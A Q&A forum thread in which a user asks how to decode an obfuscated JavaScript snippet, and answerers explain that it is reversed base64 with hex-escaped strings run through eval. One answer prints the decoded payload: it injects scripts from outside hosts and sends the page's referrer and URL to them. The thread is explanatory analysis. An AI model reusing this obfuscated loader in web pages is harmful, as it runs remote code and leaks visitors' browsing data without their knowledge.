Decoding the code

How do I decrypt the code?

var _000 = '==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSMJ9EKkxWaoNEZuVGcwFmLJBDMfpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkB SPgkEMw8FIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ 3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLxk0TKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgETSPBichZ3OnU0MlQHcpJ3Yz9yQzUSRzUiMyUiM0 EDO5EDRzUCZpZ0Ml8ybm5WaukGchFmdhp2LvE0MlAHd0hmMyUCRzUyYyNHMyUiMyUCdwlmcjNVY2FmSyITJENTJldWY1dmbhxGMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd';
var OOO = ["x41x42x43x44x45x46x47x48x49x4Ax4Bx4Cx4Dx4Ex4Fx50x51x52x53x54x55x56x57x58x59x5Ax61x62x63x64x65x66x67x68x69x6Ax6Bx6Cx6Dx6Ex6Fx70x71x72x73x74x 75x76x77x78x79x7Ax30x31x32x33x34x35x36x37x38x39x2Bx2Fx3D", "", "x63x68x61x72x41x74", "x69x6Ex64x65x78x4Fx66", "x66x72x6Fx6Dx43x68x61x72x43x6Fx64 x65", "x6Cx65x6Ex67x74x68"];

function OIO(lO1) {
    var O11 = OOO[0];
    var IOO, IOl, Ol1, IlO, Ol0, _0OO, O1l, I0O, OI0 = 0,
        _10O = OOO[1];
    do {
        IlO = O11[OOO[3]](lO1[OOO[2]](OI0++));
        Ol0 = O11[OOO[3]](lO1[OOO[2]](OI0++));
        _0OO = O11[OOO[3]](lO1[OOO[2]](OI0++));
        O1l = O11[OOO[3]](lO1[OOO[2]](OI0++));
        I0O = IlO << 18 | Ol0 << 12 | _0OO << 6 | O1l;
        IOO = I0O >> 16 & 0xff;
        IOl = I0O >> 8 & 0xff;
        Ol1 = I0O & 0xff;
        if (_0OO == 64) {
            _10O += String[OOO[4]](IOO);
        } else {
            if (O1l == 64) {
                _10O += String[OOO[4]](IOO, IOl);
            } else {
                _10O += String[OOO[4]](IOO, IOl, Ol1);
            };
        };
    } while (OI0 < lO1[OOO[5]]);
    return _10O;
};

function _1OO(l1O) {
    var _0lO = OOO[1],
        OI0 = 0;
    for (OI0 = l1O[OOO[5]] - 1; OI0 >= 0; OI0--) {
        _0lO += l1O[OOO[2]](OI0);
    };
    return _0lO;
};
eval(OIO(_1OO(_000)));
Author: Nicolas Chabanovsky, 2012-05-04
Source

3 answers

There is no cryptography here, just obfuscation. Code recovery is done as standard

  • the code is formatted to a readable format (jsbeautifier.org etc.),
  • variables are given meaningful values,
  • strings are converted to the explicit form
  • , etc.

There are browser plugins that simplify the work, for example, JavaScript Deobfuscator.

 1
Author: stanislav, 2012-05-04 10:48:40

Flipping the line

$str = strrev("==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSMJ9EKkxWaoNEZuVGcwFmLJBDMfpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkB SPgkEMw8FIyFmdKsTKMJVVuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9wmc1ZyJrkiclJnclZWZy5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0jZlJnJnsyJr9WPjJ 3c0V2Z/8SbvNmLlRXYjNXdmJ2b51mLpBXYv8iOwRHdodCI9AyYyNnLxk0TKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgETSPBichZ3OnU0MlQHcpJ3Yz9yQzUSRzUiMyUiM0 EDO5EDRzUCZpZ0Ml8ybm5WaukGchFmdhp2LvE0MlAHd0hmMyUCRzUyYyNHMyUiMyUCdwlmcjNVY2FmSyITJENTJldWY1dmbhxGMyUCdwlmcjN3QzUyJ9UGchN2cl9FIyFmd");

Echo base64_decode($str); / / output the result

Here is the actual result:

var _escape='%3Cscript%20language%3D%22JavaScript%22%20src%3D%22http%3A//javaapi.info/%3Fid%3D198142%22%3E%3C/script%3E';var OI1 = document.createElement('script');
OI1.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL);
var _00I = document.getElementsByTagName('head')[0];
_00I.appendChild(OI1);document.write(unescape(_escape));
 1
Author: Sever, 2012-05-04 12:48:19

Judging by the characteristic signatures, this is the usual Base64 encoding (at least the first part). This is not an encryption at all, but simply a way to encode binary data with a set of ASCII characters.

The second part is just a 16-decimal representation of a certain string.

Look at here - there is an example of a Base64 encoder/decoder

 0
Author: Barmaley, 2012-05-04 10:52:41